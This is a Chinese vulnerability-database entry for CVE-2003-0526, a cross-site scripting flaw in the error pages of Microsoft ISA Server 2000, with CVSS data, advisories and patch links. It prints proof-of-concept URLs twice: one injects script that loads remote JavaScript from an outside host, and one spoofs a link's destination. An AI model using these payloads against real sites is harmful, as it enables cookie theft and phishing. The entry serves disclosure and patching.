| CVE-2003-0526 |
|
发布时间 :2003-08-18 00:00:00 | ||
| 修订时间 :2017-10-10 21:29:10 | ||||
| NMCOES |
[原文]Cross-site scripting (XSS) vulnerability in Microsoft Internet Security and Acceleration (ISA) Server 2000 allows remote attackers to inject arbitrary web script via a URL containing the script in the domain name portion, which is not properly cleansed in the default error pages (1) 500.htm for "500 Internal Server error" or (2) 404.htm for "404 Not Found."
[CNNVD]Microsoft ISA服务器HTTP错误处理跨站脚本执行漏洞(MS03-028)(CNNVD-200308-071)
Microsoft ISA服务器集成可扩展,多层企业级防火墙,可扩展高性能WEB缓冲服务程序。
Microsoft ISA在错误页面在处理客户端消息时缺少充分过滤,远程攻击者可以利用这个漏洞进行跨站脚本执行攻击,可能窃取用户用于验证的敏感COOKIE信息。
ISA服务器遇到HTTP错误代码如"404 Not Found"或者"500 Internal Server Error",ISA服务器就会返回HTML形式的错误处理信息,这些HTML文件使用脚本输出链接作为SERVER。TLD的部分URL。通过构建特殊形式的URL可能在HTTP错误处理页面中包含任意脚本命令,当用户访问这些包含恶意脚本的链接时,可导致用户基于验证的Cookie等敏感信息泄露。
- CVSS (基础分值)
| CVSS分值: | 6.8 | [中等(MEDIUM)] |
| 机密性影响: | [--] | |
| 完整性影响: | [--] | |
| 可用性影响: | [--] | |
| 攻击复杂度: | [--] | |
| 攻击向量: | [--] | |
| 身份认证: | [--] |
- CPE (受影响的平台与产品)
| cpe:/a:microsoft:isa_server:2000 | Microsoft isa server 2000 |
| cpe:/a:microsoft:isa_server:2000:fp1 | Microsoft isa_server 2000 fp1 |
| cpe:/a:microsoft:isa_server:2000:sp1 | Microsoft isa_server 2000 sp1 |
- OVAL (用于检测的技术细节)
| oval:org.mitre.oval:def:117 | Microsoft ISA Server Cross-Site Scripting |
| *OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。 | |
- 官方数据库链接
- 其它链接及资源
|
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0029.html (VENDOR_ADVISORY) VULNWATCH 20030716 ISA Server - Error Page Cross Site Scripting |
|
http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0031.html (UNKNOWN) VULNWATCH 20030716 Microsoft ISA Server HTTP error handler XSS (TL#007) |
|
http://marc.info/?l=bugtraq&m=105838519729525&w=2 (UNKNOWN) BUGTRAQ 20030716 Microsoft ISA Server HTTP error handler XSS (TL#007) |
|
http://marc.info/?l=bugtraq&m=105838862201266&w=2 (UNKNOWN) BUGTRAQ 20030716 ISA Server - Error Page Cross Site Scripting |
|
http://marc.info/?l=ntbugtraq&m=105838590030409&w=2 (UNKNOWN) NTBUGTRAQ 20030716 Microsoft ISA Server HTTP error handler XSS (TL#007) |
|
http://pivx.com/larholm/adv/TL006 (UNKNOWN) MISC http://pivx.com/larholm/adv/TL006 |
|
http://www.microsoft.com/technet/security/bulletin/ms03-028.asp (UNKNOWN) MS MS03-028 |
- 漏洞信息
| Microsoft ISA服务器HTTP错误处理跨站脚本执行漏洞(MS03-028) | |
| 中危 | 输入验证 |
| 2003-08-18 00:00:00 | 2005-10-20 00:00:00 |
| 远程 | |
| Microsoft ISA服务器集成可扩展,多层企业级防火墙,可扩展高性能WEB缓冲服务程序。 Microsoft ISA在错误页面在处理客户端消息时缺少充分过滤,远程攻击者可以利用这个漏洞进行跨站脚本执行攻击,可能窃取用户用于验证的敏感COOKIE信息。 ISA服务器遇到HTTP错误代码如"404 Not Found"或者"500 Internal Server Error",ISA服务器就会返回HTML形式的错误处理信息,这些HTML文件使用脚本输出链接作为SERVER。TLD的部分URL。通过构建特殊形式的URL可能在HTTP错误处理页面中包含任意脚本命令,当用户访问这些包含恶意脚本的链接时,可导致用户基于验证的Cookie等敏感信息泄露。 |
|
- 公告与补丁
|
厂商补丁: Microsoft --------- Microsoft已经为此发布了一个安全公告(MS03-028)以及相应补丁: MS03-028:Flaw in ISA Server Error Pages Could Allow Cross-Site Scripting Attack (Q816456) 链接: http://www.microsoft.com/technet/security/bulletin/MS03-028.asp 补丁下载: Microsoft ISA Server english: http://download.microsoft.com/download/4/6/4/464c95cd-8488-410d-bacb-69b25eaa7822/ISA2000-KB816456-x86.exe Microsoft ISA Server French: http://download.microsoft.com/download/a/d/6/ad64a2af-d359-44e5-88d9-321269f1afde/ISA2000-KB816456-x86.exe Microsoft ISA Server German: http://download.microsoft.com/download/9/f/3/9f39d8a7-4897-43e5-bd90-70cc468139ae/ISA2000-KB816456-x86.exe Microsoft ISA Server Spanish: http://download.microsoft.com/download/5/a/a/5aabcffe-e89c-4275-b2ba-64c47e42f078/ISA2000-KB816456-x86.exe Microsoft ISA Server Japanese: http://download.microsoft.com/download/1/5/b/15b400a5-5b40-4721-92b0-caef3f190146/ISA2000-KB816456-x86.exe |
- 漏洞信息 (22919)
| Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities (EDBID:22919) | |
| windows | remote |
| 2003-07-16 | Verified |
| 0 | Brett Moore |
| N/A | [点击下载] |
source: http://www.securityfocus.com/bid/8207/info ISA server will output certain error pages when requests that are invalid, for whatever reason, are transmitted through it. These error pages will appear in the context of the domain that the request was made for. It has been reported that many of these error pages contain cross-site scripting vulnerabilities that allow for the execution of script code (embedded in the request URI) in the context of client requested domains. The following proof-of-concept was provided: http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0 The above proof-of-concept will include and execute http://jscript.dk/test.js on YOUR.TLD, this is provided that YOUR.TLD is protected by an ISA Server installation. *http://<iframe>:test@[site]/test The exploit provided for BID 4486 will also reportedly work for this vulnerability. An additional proof-of-concept was supplied by "http-equiv@excite.com" <1@malware.com> that demonstrates a true status and a false destination: <A href="http://www.example.com%09%09%09@%09%09%09%09%09%09 09www.malware.com">http://www.example.com</A>
- 漏洞信息
| 2298 | |
| Microsoft ISA Server Error Page XSS | |
| Remote / Network Access | Input Manipulation |
| Loss of Integrity | |
| Exploit Public | |
- 漏洞描述
| ISA Server contains a flaw that allows a remote cross site scripting attack. This flaw exists because the application does not validate the returned URI upon submission to the error page script. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity. |
- 时间线
| 2003-07-16 | 2003-05-21 |
| 2003-07-16 | Unknow |
- 解决方案
| Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability. |
- 相关参考
|
漏洞作者
- 漏洞信息
| Microsoft ISA Server Cross-Site Scripting Vulnerabilities | |
| Input Validation Error | 8207 |
| Yes | No |
| 2003-07-16 12:00:00 | 2009-07-11 10:56:00 |
| Discovery credited to Brett Moore of Security-Assessment.com. | |
- 受影响的程序版本
| Microsoft ISA Server 2000 SP1 Microsoft ISA Server 2000 FP1 Microsoft ISA Server 2000 |
- 漏洞讨论
| ISA server will output certain error pages when requests that are invalid, for whatever reason, are transmitted through it. These error pages will appear in the context of the domain that the request was made for. It has been reported that many of these error pages contain cross-site scripting vulnerabilities that allow for the execution of script code (embedded in the request URI) in the context of client requested domains. This vulnerability is reportedly similar to the one described in BID 4486. |
- 漏洞利用
|
The following proof-of-concept was provided: http://<img%09src=""%09onerror="document.scripts[0].src=%27http%5Cx3a%5Cx2f%5Cx2fjscript.dk%5Cx2ftest.js%27;">script@YOUR.TLD/%U0 The above proof-of-concept will include and execute http://jscript.dk/test.js on YOUR.TLD, this is provided that YOUR.TLD is protected by an ISA Server installation. *http://<iframe>:test@[site]/test The exploit provided for BID 4486 will also reportedly work for this vulnerability. An additional proof-of-concept was supplied by "http-equiv@excite.com" <1@malware.com> that demonstrates a true status and a false destination: <A href="http://www.example.com%09%09%09@%09%09%09%09%09%09 09www.malware.com">http://www.example.com</A> |
- 解决方案
|
Microsoft has released a patch: Microsoft ISA Server 2000 FP1
Microsoft ISA Server 2000 SP1
|
- 相关参考
|
三人行,必有我师焉。择其善者而从之,其不善者而改之。